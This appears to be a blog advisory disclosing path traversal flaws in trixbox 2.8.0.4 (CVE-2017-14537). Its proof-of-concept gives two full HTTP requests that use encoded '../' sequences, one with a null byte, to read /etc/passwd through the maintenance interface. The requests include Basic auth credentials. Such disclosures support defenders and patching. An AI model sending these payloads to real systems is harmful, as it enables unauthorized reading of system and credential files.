TrixBox Multiple Path Traversal Vulnerabilities [CVE-2017-14537]

@tiger_tigerboy

Title: TrixBox Multiple Path Traversal Vulnerabilities

Affected Product: trixbox-2.8.0.4

Product Page: https://sourceforge.net/projects/asteriskathome/

CVSSv2: (AV:N/AC:M/Au:S/C:C/I:N/A:N)   Severity: Medium

Solution Status: N/A

Credit: Sachin Wagh (@tiger_tigerboy)


Description:

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.  (Source: OWASP).

 Impact:

Remote attackers may use a specially crafted request with directory-traversal sequences (‘../’) to retrieve sensitive information.

Proof-of-Concept:

  • Affected Request -1:
POST /maint/index.php?packages HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST http://192.168.0.6/maint/index.php?packages HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.6/maint/index.php?packages
Content-Length: 160
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive

xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
&xajaxargs[]=yumPackages

 

@tiger_tigerboy

Fig-1: Path Traversal Vulnerability

  • Affected Request -2:
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.6/maint/
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1

@tiger_tigerboy

Fig-2: Path Traversal Vulnerability


Credit:

Sachin Wagh (@tiger_tigerboy)

Advertisement
Privacy Settings

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s